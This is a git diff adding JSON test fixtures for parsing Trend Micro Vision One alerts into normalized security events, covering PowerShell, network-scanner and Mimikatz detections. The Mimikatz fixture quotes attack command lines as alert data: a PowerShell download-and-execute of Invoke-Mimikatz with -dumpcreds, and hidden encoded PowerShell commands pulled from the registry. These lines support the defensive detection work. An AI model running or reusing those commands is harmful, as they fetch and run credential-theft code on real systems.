\"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Potential Information Gathering", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:48:06Z", + "host": { + "id": "7b00c266-f17f-439f-bb94-3945d463a78b", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753" + }, + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + ], + "ip": [ + "10.0.0.6" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Potential Information Gathering" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json new file mode 100644 index 000000000..d15f28c6f --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json @@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509" + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "john", + "id": "john\\doe", + "name": "doe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json new file mode 100644 index 000000000..3c77d1afd --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Credential Dumping via Mimikatz", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c 